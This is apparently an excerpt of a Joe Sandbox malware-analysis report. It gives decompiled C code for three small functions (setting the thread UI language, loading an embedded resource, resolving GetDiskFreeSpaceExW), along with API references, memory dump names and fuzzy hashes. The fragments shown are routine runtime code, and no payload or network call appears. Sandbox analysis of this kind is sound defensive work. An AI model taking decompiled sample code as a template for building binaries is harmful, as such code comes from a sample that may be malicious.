                                                                                                                            0x0040a74e
                                                                                                                            0x0040a753
                                                                                                                            0x0040a755
                                                                                                                            0x0040a756
                                                                                                                            0x0040a75d
                                                                                                                            0x0040a765
                                                                                                                            0x0040a76a
                                                                                                                            0x0040a76a
                                                                                                                            0x0040a770
                                                                                                                            0x0040a773
                                                                                                                            0x0040a773
                                                                                                                            0x0040a75d
                                                                                                                            0x0040a77a
                                                                                                                            0x0040a781
                                                                                                                            0x0040a781
                                                                                                                            0x0040a78a
                                                                                                                            0x0040a794
                                                                                                                            0x0040a7a2
                                                                                                                            0x0040a7aa
                                                                                                                            0x0040a7c7
                                                                                                                            0x0040a7c7
                                                                                                                            0x0040a7cf
                                                                                                                            0x00000000
                                                                                                                            0x0040a7d7
                                                                                                                            0x0040a7e1

                                                                                                                            APIs
                                                                                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
                                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
                                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
                                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7
                                                                                                                              • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
                                                                                                                              • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2255706666-0
                                                                                                                            • Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                                                                            • Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
                                                                                                                            • Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                                                                            • Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004AF9F0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004AF9F0() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceW(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E004AF834();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E004AF834();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E004AF834();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E004AF834();
				}
				return _t12;
			}






                                                                                                                            0x004af9ff
                                                                                                                            0x004afa03
                                                                                                                            0x004afa05
                                                                                                                            0x004afa05
                                                                                                                            0x004afa15
                                                                                                                            0x004afa17
                                                                                                                            0x004afa17
                                                                                                                            0x004afa24
                                                                                                                            0x004afa28
                                                                                                                            0x004afa2a
                                                                                                                            0x004afa2a
                                                                                                                            0x004afa35
                                                                                                                            0x004afa39
                                                                                                                            0x004afa3b
                                                                                                                            0x004afa3b
                                                                                                                            0x004afa43

                                                                                                                            APIs
                                                                                                                            • FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
                                                                                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3473537107-0
                                                                                                                            • Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                                                                            • Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
                                                                                                                            • Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                                                                            • Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00420BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00420BD8() {
				void* __ebx;
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = GetModuleHandleW(L"kernel32.dll");
				_t3 = _t1;
				if(_t1 != 0) {
					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
					 *0x4b7e30 = _t1;
				}
				if( *0x4b7e30 == 0) {
					 *0x4b7e30 = E0041A4DC;
					return E0041A4DC;
				}
				return _t1;
			}






                                                                                                                            0x00420bde
                                                                                                                            0x00420be3
                                                                                                                            0x00420be7
                                                                                                                            0x00420bef
                                                                                                                            0x00420bf4
                                                                                                                            0x00420bf4
                                                                                                                            0x00420c00
                                                                                                                            0x00420c07
                                                                                                                            0x00000000
                                                                                                                            0x00420c07
                                                                                                                            0x00420c0d

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE
                                                                                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                                            • API String ID: 1646373207-1127948838
                                                                                                                            • Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                                                                            • Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
                                                                                                                            • Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                                                                            • Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%